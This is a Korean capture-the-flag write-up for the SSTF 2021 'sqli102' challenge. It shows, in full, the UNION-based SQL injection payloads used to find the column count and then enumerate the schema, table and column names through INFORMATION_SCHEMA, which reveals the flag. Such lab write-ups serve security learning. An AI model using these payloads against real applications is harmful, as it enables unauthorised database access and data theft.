[sstf2021] sqli102

sqli102

UNION을 이용하여 sqli 공격을 진행해보자

 

UNION을 사용하기 위한 조건으로 두 쿼리문의 컬럼 갯수(이 문제에선 books table의 컬럼 갯수)가 같아야한다

그것을 먼저 찾아보자

 

일단 쿼리문은

select * from books where title like '%".{$_GET['searchkey']}."'

 

%' union select 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'e' #

 

이로서 컬럼 갯수는 8개 임을 알 수 있고

Title b 두번째

Author c 세번째

Price e 여덟번째

값을 뿌린다는 것을 알 수 있다

 

DB 명을 알아내보자

%' union select 'a', SCHEMA_NAME, 'c', 'd', 'e', 'f', 'g', 'e' from INFORMATION_SCHEMA.SCHEMATA #

sqli102

 

table 명을 알아내보자

%' union select 'a', TABLE_NAME, 'c', 'd', 'e', 'f', 'g', 'e' from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA='sqli102' #

findme

 

column 명을 알아내보자

%' union select 'a', COLUMN_NAME, 'c', 'd', 'e', 'f', 'g', 'e' from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='findme' #

 

column명에 flag 값이 적혀있다!